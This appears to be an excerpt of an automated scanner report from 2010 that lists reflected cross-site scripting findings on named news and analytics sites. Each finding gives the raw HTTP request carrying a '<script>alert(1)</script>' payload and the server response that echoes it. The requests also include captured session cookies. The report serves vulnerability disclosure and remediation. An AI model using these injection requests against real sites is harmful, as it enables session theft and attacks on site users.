Set-Cookie: D3=0v3602.Vry1Ksd0vaT00EMLHW+s60uUv00W1820wsc0rWH02A.820wsc0r9+04E.o61ws20uP400ai820wr+0sNY00wJ820wsd0sJz00wJ820wsd0rWH02.Vg210sd0oLK00Hs820wrB0vq905Zw820ws50vjk004H820ws50vlN04od820wrZ0uwb02.V820ws30t8k005D820ws50q+Y07jq820wrU0vjk03j6820ws90v3602KuEa2wr+0uP4021RSdzosb0u7202Rfo61wrM0lN600w1820wrG0nCJ02bP820wrM0sNY00b1820ws90uyM005D820wrN0ub+01Cq820wrF0uXi00Y3g410rM0tIT02fxg20wr+0suf02efm5xos50ugT00tR820ws30viV00Mm820ws30o2A03sH820wre0uP400dDm5xorY0t3m0053820wrm0nez01B9820wrV0rCe0053820wrm0uwb00Mm820ws30u4d05Gc820ws50uv201xc8y8ys50ppC007X820wrU0vsV00as820wrN; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aPa820ws3084ow80ws508Y5g410s308.I820wrF09KD820wrZ066N820wrV0aVX820wsd06Bz820wrm02Edo41wsd07l0820wrU077Tg20wr+02WGSdzosb0a4cg410rM07fto20ws50abMm5xos503sYg410sd06IXPy1Ksd04gILHW+s603Mo820wrG09EZ820ws30apK820wrU0bKd820ws507SK820wrM04uwg210rm05sM820wsc0bnAwy8ys509KL820wrB09bwg210s9; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=9a418881-221a-422b-8c26-d094f1df3ebf3Ey04g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=9a418881-221a-422b-8c26-d094f1df3ebf3Ey04g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 12 Dec 2010 01:38:26 GMT
Connection: close
Content-Length: 1739

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

3. Cross-site scripting (reflected)  previous
There are 1027 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://7thspace.com/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://7thspace.com
Path:   /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72978"><script>alert(1)</script>ab87667034 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034 HTTP/1.1
Host: 7thspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:41:29 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=f73edc40405930d3a0b9222aaf7bb10a; path=/
Connection: close
Content-Type: text/html
Content-Length: 23908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html>
<head>
<title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title>
<meta name="description" CO
...[SNIP]...
<form id="7_comments_submit_form" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034#cst" onsubmit="rememberfields()" style="display:none;">
...[SNIP]...

3.2. http://7thspace.com/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://7thspace.com
Path:   /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbed9"><script>alert(1)</script>d34128e6770 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1 HTTP/1.1
Host: 7thspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:40:59 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=bb4e5df43896a4d6222ed1d31ff729c6; path=/
Connection: close
Content-Type: text/html
Content-Length: 23918

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html>
<head>
<title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title>
<meta name="description" CO
...[SNIP]...
<form id="form2" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1">
...[SNIP]...

3.3. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/10/4754/Messaging-Collaboration/research-social-networking.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ae786--><script>alert(1)</script>c1a688e3275 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ript%3Ealert%281%29%3C%2Fscript%3Ec1a688e3275%2F10%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html">
...[SNIP]...

3.4. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/10/4754/Messaging-Collaboration/research-social-networking.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 4cbf8--><script>alert(1)</script>caa7cf49b0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
script%3Ealert%281%29%3C%2Fscript%3Ecaa7cf49b0e%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html">
...[SNIP]...

3.5. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/10/4754/Messaging-Collaboration/research-social-networking.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 52eaf--><script>alert(1)</script>6554ec6cc27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:06 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:06 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3Cscript%3Ealert%281%29%3C%2Fscript%3E6554ec6cc27%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html">
...[SNIP]...

3.6. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/10/4754/Messaging-Collaboration/research-social-networking.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 305ab--><script>alert(1)</script>dcba560a1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcba560a1d%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html">
...[SNIP]...

3.7. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/10/4754/Messaging-Collaboration/research-social-networking.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload baf9c--><script>alert(1)</script>2532fb38a24 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:20 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2532fb38a24&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24">
...[SNIP]...

3.8. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/10/4754/Messaging-Collaboration/research-social-networking.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b59d--><script>alert(1)</script>ea486472576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:40:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:18 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 58369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
Cscript%3Ealert%281%29%3C%2Fscript%3Eea486472576%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1">
...[SNIP]...

3.9. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 58d2b--><script>alert(1)</script>8691f40a2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
-%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8691f40a2e4%2F14%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html">
...[SNIP]...

3.10. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 47164--><script>alert(1)</script>d17787e4872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed17787e4872%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html">
...[SNIP]...

3.11. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload a1c0a--><script>alert(1)</script>0b4fea96c73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:06 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:07 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
c0a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b4fea96c73%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html">
...[SNIP]...

3.12. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
